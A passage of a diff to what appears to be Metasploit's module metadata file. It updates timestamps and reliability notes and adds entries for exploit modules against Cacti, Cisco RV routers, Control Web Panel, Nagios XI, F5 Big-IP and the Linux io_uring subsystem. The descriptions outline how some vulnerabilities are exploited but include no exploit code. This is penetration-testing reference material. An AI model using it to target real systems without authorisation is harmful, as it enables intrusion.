    "ref_name": "scanner/winrm/winrm_auth_methods",
@@ -50133,7 +50723,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2021-09-10 15:13:30 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
@@ -50184,7 +50774,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2021-09-24 12:01:30 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
@@ -50234,12 +50824,12 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2021-01-28 10:35:25 +0000",
+    "mod_time": "2023-01-03 19:54:06 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_wql",
    "check": false,
-    "post_auth": true,
+    "post_auth": false,
    "default_credential": false,
    "notes": {
    },
@@ -52008,7 +52598,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb",
    "is_install_path": true,
    "ref_name": "server/teamviewer_uri_smb_redirect",
@@ -52016,8 +52606,14 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
      "SideEffects": [
        "ioc-in-logs"
+      ],
+      "Reliability": [
+
      ]
    },
    "session_types": false,
@@ -52693,7 +53289,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb",
    "is_install_path": true,
    "ref_name": "sqli/dlink/dlink_central_wifimanager_sqli",
@@ -52701,6 +53297,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -57172,7 +57778,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-07-18 23:31:34 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "freebsd/local/intel_sysret_priv_esc",
@@ -57228,7 +57834,7 @@
      "FreeBSD 12.0-RELEASE r341666",
      "FreeBSD 12.1-RELEASE r354233"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-02 18:45:43 +0000",
    "path": "/modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "freebsd/local/ip6_setpktopt_uaf_priv_esc",
@@ -57236,6 +57842,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
      "Stability": [
        "crash-os-restarts"
      ],
@@ -57336,7 +57945,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-08-24 11:47:50 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "freebsd/local/rtld_execl_priv_esc",
@@ -58944,7 +59553,7 @@
    "targets": [
      "Linux Dropper"
    ],
-    "mod_time": "2022-02-25 11:34:31 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/linux/http/axis_app_install.rb",
    "is_install_path": true,
    "ref_name": "linux/http/axis_app_install",
@@ -59210,6 +59819,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/cacti_unauthenticated_cmd_injection": {
+    "name": "Cacti 1.2.22 unauthenticated command injection",
+    "fullname": "exploit/linux/http/cacti_unauthenticated_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-12-05",
+    "type": "exploit",
+    "author": [
+      "Stefan Schiller",
+      "Steven Seeley",
+      "Owen Gong",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an unauthenticated command injection\n          vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in\n          order to achieve unauthenticated remote code execution as the\n          www-data user.\n\n          The module first attempts to obtain the Cacti version to see\n          if the target is affected. If LOCAL_DATA_ID and/or HOST_ID\n          are not set, the module will try to bruteforce the missing\n          value(s). If a valid combination is found, the module will\n          use these to attempt exploitation. If LOCAL_DATA_ID and/or\n          HOST_ID are both set, the module will immediately attempt\n          exploitation.\n\n          During exploitation, the module sends a GET request to\n          /remote_agent.php with the action parameter set to polldata\n          and the X-Forwarded-For header set to the provided value for\n          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the\n          poller_id parameter is set to the payload and the host_id\n          and local_data_id parameters are set to the bruteforced or\n          provided values. If X_FORWARDED_FOR_IP is set to an address\n          that is resolvable to a hostname in the poller table, and the\n          local_data_id and host_id values are vulnerable, the payload\n          set for poller_id will be executed by the target.\n\n          This module has been successfully tested against Cacti\n          version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)",
+    "references": [
+      "CVE-2022-46169",
+      "URL-https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf",
+      "URL-https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169",
+      "URL-https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2023-01-23 11:53:19 +0000",
+    "path": "/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/cacti_unauthenticated_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/cayin_cms_ntp": {
    "name": "Cayin CMS NTP Server RCE",
    "fullname": "exploit/linux/http/cayin_cms_ntp",
@@ -59843,6 +60518,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/cisco_rv340_lan": {
+    "name": "Cisco RV Series Authentication Bypass and Command Injection",
+    "fullname": "exploit/linux/http/cisco_rv340_lan",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2021-11-02",
+    "type": "exploit",
+    "author": [
+      "Biem Pham",
+      "Neterum",
+      "jbaines-r7"
+    ],
+    "description": "This module exploits two vulnerabilities, a session ID directory traversal authentication\n          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,\n          and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.\n          This access can then be used to pivot to other parts of the network. This module works on firmware\n          versions 1.0.03.24 and below.",
+    "references": [
+      "CVE-2022-20705",
+      "CVE-2022-20707",
+      "ZDI-22-410",
+      "ZDI-22-411"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-02-13 17:49:09 +0000",
+    "path": "/modules/exploits/linux/http/cisco_rv340_lan.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/cisco_rv340_lan",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cisco_rv_series_authbypass_and_rce": {
    "name": "Cisco Small Business RV Series Authentication Bypass and Command Injection",
    "fullname": "exploit/linux/http/cisco_rv_series_authbypass_and_rce",
@@ -60028,6 +60768,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/control_web_panel_login_cmd_exec": {
+    "name": "CWP login.php Unauthenticated RCE",
+    "fullname": "exploit/linux/http/control_web_panel_login_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-05",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre",
+      "Numan Türle"
+    ],
+    "description": "Control Web Panel versions < 0.9.8.1147 are vulnerable to\n          unauthenticated OS command injection. Successful exploitation results\n          in code execution as the root user. The results of the command are not\n          contained within the HTTP response and the request will block while\n          the command is running.",
+    "references": [
+      "CVE-2022-44877",
+      "URL-https://github.com/numanturle/CVE-2022-44877",
+      "URL-https://control-webpanel.com/changelog#1674073133745-84af1b53-c121"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 2031,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-01-25 13:45:18 +0000",
+    "path": "/modules/exploits/linux/http/control_web_panel_login_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/control_web_panel_login_cmd_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/cpi_tararchive_upload": {
    "name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
    "fullname": "exploit/linux/http/cpi_tararchive_upload",
@@ -63263,10 +64066,11 @@
      "cbmixx",
      "Green-m <greenm.xxoo@gmail.com>"
    ],
-    "description": "This module uses built-in functionality to execute arbitrary commands on an unsecured Hadoop server which is not configured for strong\n          authentication, via Hadoop's standard ResourceManager REST API.",
+    "description": "This module uses Hadoop's standard ResourceManager REST API to execute arbitrary commands on an unsecured Hadoop server.\n          Hadoop administrators should enable Kerberos authentication for these endpoints by changing the 'hadoop.security.authentication' setting in 'core-site.xml' from 'simple' (the default) to 'kerberos' before exposing the node to the network.",
    "references": [
      "URL-http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf",
-      "URL-https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn"
+      "URL-https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn",
+      "URL-https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html"
    ],
    "platform": "Linux",
    "arch": "x86, x64",
@@ -63289,7 +64093,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-11-16 11:31:59 +0000",
+    "mod_time": "2023-02-15 12:37:06 +0000",
    "path": "/modules/exploits/linux/http/hadoop_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/hadoop_unauth_exec",
@@ -63559,7 +64363,7 @@
    "targets": [
      "IBM Data Risk Manager <= 2.0.4"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2023-02-08 15:46:07 +0000",
    "path": "/modules/exploits/linux/http/ibm_drm_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/ibm_drm_rce",
@@ -63567,6 +64371,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -64860,7 +65674,7 @@
      "Cody Winkler",
      "numan türle"
    ],
-    "description": "This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.\n            The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.",
+    "description": "This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.\n          The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.",
    "references": [
      "EDB-48483",
      "CVE-2020-7209",
@@ -64891,7 +65705,7 @@
      "Automatic (Unix In-Memory)",
      "Automatic (Linux Dropper)"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:46:07 +0000",
    "path": "/modules/exploits/linux/http/linuxki_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/linuxki_rce",
@@ -64899,6 +65713,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": true
@@ -65703,6 +66527,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/nagios_xi_configwizards_authenticated_rce": {
+    "name": "Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection",
+    "fullname": "exploit/linux/http/nagios_xi_configwizards_authenticated_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2021-02-13",
+    "type": "exploit",
+    "author": [
+      "Matthew Mathur"
+    ],
+    "description": "This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are\n          OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm\n          configuration wizards that allow an authenticated user to perform remote code\n          execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.\n\n          Valid credentials for a Nagios XI user are required. This module has\n          been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.",
+    "references": [
+      "CVE-2021-25296",
+      "CVE-2021-25297",
+      "CVE-2021-25298",
+      "URL-https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux (x86)",
+      "Linux (x64)",
+      "CMD"
+    ],
+    "mod_time": "2023-02-07 14:30:11 +0000",
+    "path": "/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/nagios_xi_configwizards_authenticated_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/nagios_xi_magpie_debug": {
    "name": "Nagios XI Magpie_debug.php Root Remote Code Execution",
    "fullname": "exploit/linux/http/nagios_xi_magpie_debug",
@@ -66922,7 +67810,7 @@
      "Linux (x64)",
      "Linux (cmd)"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:46:07 +0000",
    "path": "/modules/exploits/linux/http/pandora_fms_events_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pandora_fms_events_exec",
@@ -66930,6 +67818,16 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -72102,7 +73000,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/abrt_sosreport_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/abrt_sosreport_priv_esc",
@@ -72155,7 +73053,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
@@ -72215,7 +73113,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/af_packet_packet_set_ring_priv_esc",
@@ -72368,7 +73266,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/asan_suid_executable_priv_esc",
@@ -72524,7 +73422,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -72577,7 +73475,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bpf_priv_esc",
@@ -72643,7 +73541,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bpf_sign_extension_priv_esc",
@@ -72794,7 +73692,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-08-31 15:36:00 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe",
@@ -72850,7 +73748,7 @@
      "x86_64",
      "aarch64"
    ],
-    "mod_time": "2021-12-02 10:31:47 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cve_2021_3493_overlayfs",
@@ -72974,7 +73872,7 @@
      "x86",
      "aarch64"
    ],
-    "mod_time": "2022-03-09 11:06:26 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cve_2021_4034_pwnkit_lpe_pkexec",
@@ -73090,7 +73988,7 @@
    "targets": [
      "Ubuntu Linux 5.13.0-37"
    ],
-    "mod_time": "2022-04-21 07:44:40 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/cve_2022_0995_watch_queue.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cve_2022_0995_watch_queue",
@@ -73114,6 +74012,63 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/cve_2022_1043_io_uring_priv_esc": {
+    "name": "io_uring Same Type Object Reuse Priv Esc",
+    "fullname": "exploit/linux/local/cve_2022_1043_io_uring_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2022-03-22",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Ryota Shiga",
+      "Mathias Krause"
+    ],
+    "description": "This module exploits a bug in io_uring leading to an additional put_cred()\n          that can be exploited to hijack credentials of other processes.\n\n          We spawn SUID programs to get the free'd cred object reallocated by a\n          privileged process and abuse them to create a SUID root binary ourselves\n          that'll pop a shell.\n\n          The dangling cred pointer will, however, lead to a kernel panic as soon as\n          the task terminates and its credentials are destroyed. We therefore detach\n          from the controlling terminal, block all signals and rest in silence until\n          the system shuts down and we get killed hard, just to cry in vain, seeing\n          the kernel collapse.\n\n          The bug affected kernels from v5.12-rc3 to v5.14-rc7.\n\n          More than 1 CPU is required for exploitation.\n\n          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic",
+    "references": [
+      "URL-https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse",
+      "URL-https://github.com/opensrcsec/same_type_object_reuse_exploits",
+      "URl-https://github.com/torvalds/linux/commit/a30f895ad3239f45012e860d4f94c1a388b36d14",
+      "CVE-2022-1043"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2023-02-02 10:19:07 +0000",
+    "path": "/modules/exploits/linux/local/cve_2022_1043_io_uring_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/cve_2022_1043_io_uring_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/desktop_privilege_escalation": {
    "name": "Desktop Linux Password Stealer and Privilege Escalation",
    "fullname": "exploit/linux/local/desktop_privilege_escalation",
@@ -73187,7 +74142,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
@@ -73236,7 +74191,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb",
    "is_install_path": true,
    "ref_name": "linux/local/docker_daemon_privilege_escalation",
@@ -73263,7 +74218,7 @@
    "author": [
      "stealthcopter"
    ],
-    "description": "This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release\n              feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.",
+    "description": "This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release\n            feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.",
    "references": [
      "EDB-47147",
      "URL-https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/",
@@ -73281,7 +74236,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-02-16 13:56:50 +0000",
+    "mod_time": "2023-02-08 15:46:07 +0000",
    "path": "/modules/exploits/linux/local/docker_privileged_container_escape.rb",
    "is_install_path": true,
    "ref_name": "linux/local/docker_privileged_container_escape",
@@ -73289,6 +74244,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": [
      "shell",
@@ -73391,7 +74356,7 @@
    "targets": [
      "Exim 4.87 - 4.91"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -73406,6 +74371,60 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/f5_create_user": {
+    "name": "F5 Big-IP Create Admin User",
+    "fullname": "exploit/linux/local/f5_create_user",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-11-16",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This creates a local user with a username/password and root-level\n          privileges. Note that a root-level account is not required to do this,\n          which makes it a privilege escalation issue.\n\n          Note that this is pretty noisy, since it creates a user account and\n          creates log files and such. Additionally, most (if not all)\n          vulnerabilities in F5 grant root access anyways.\n\n          Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb",
+    "references": [
+      "URL-https://github.com/rbowes-r7/refreshing-mcp-tool",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387"
+    ],
+    "platform": "Linux,Python,Unix",
+    "arch": "cmd, python",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2023-02-01 11:02:04 +0000",
+    "path": "/modules/exploits/linux/local/f5_create_user.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/f5_create_user",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "exploit_linux/local/glibc_ld_audit_dso_load_priv_esc": {
    "name": "glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation",
    "fullname": "exploit/linux/local/glibc_ld_audit_dso_load_priv_esc",
@@ -73575,7 +74594,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/glibc_realpath_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/glibc_realpath_priv_esc",
@@ -73675,7 +74694,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2022-10-05 19:43:07 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/hp_xglance_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/hp_xglance_priv_esc",
@@ -73823,7 +74842,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-05 19:43:07 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ktsuss_suid_priv_esc",
@@ -73874,7 +74893,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/lastore_daemon_dbus_priv_esc",
@@ -73924,7 +74943,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-05 19:43:07 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/libuser_roothelper_priv_esc",
@@ -73992,7 +75011,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-08 09:16:57 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/nested_namespace_idmap_limit_priv_esc",
@@ -74226,7 +75245,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/network_manager_vpnc_username_priv_esc",
@@ -74317,7 +75336,7 @@
    "targets": [
      "Micro Focus (HPE) Data Protector <= 10.40 build 118"
    ],
-    "mod_time": "2022-10-05 19:43:07 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb",
    "is_install_path": true,
